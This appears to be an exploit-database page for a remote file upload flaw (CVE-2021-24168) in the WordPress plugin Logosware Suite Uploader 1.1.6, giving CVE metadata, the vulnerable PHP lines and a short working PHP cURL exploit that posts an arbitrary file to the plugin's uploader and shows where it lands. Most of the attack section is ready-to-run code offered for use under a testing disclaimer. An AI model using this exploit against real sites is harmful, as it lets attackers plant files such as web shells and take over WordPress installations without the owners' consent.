Advertisement






WordPress Plugin Logosware Suite Uploader 1.1.6 Remote File Upload

CVE Category Price Severity
CVE-2021-24168 CWE-434 $500 High
Author Risk Exploitation Type Date
Patrik Larm High Remote 2017-07-31
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.03268 0.68237

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017070196

Below is a copy:

WordPress Plugin Logosware Suite Uploader 1.1.6 Remote File Upload[-] Title  : WordPress Plugin Logosware Suite Uploader 1.1.6 - Remote File Upload
[-] Author : Shahab Shamsi
[-] Vendor : https://wordpress.org/plugins/logosware-suite-uploader/
[-] Category : Webapps
[-] Date : 30.July.2017


Vulnerable Source:
176: if(is_uploaded_file($_FILES['zip']['tmp_name']))
207: move_uploaded_file move_uploaded_file($_FILES['zip']['tmp_name'], $tempZipPath))
206: $tempZipPath = $temporaryPath . $tempZipName; 
190: $temporaryPath = $this->tempDir . $temporaryDir . "/"; 
189: $temporaryDir = date("YmdHis"); 
204: $tempZipName = "zipfile" . date("His") . ".zip"; 



Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/lw-suite-uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>


Location File:
http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/file.jpg

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum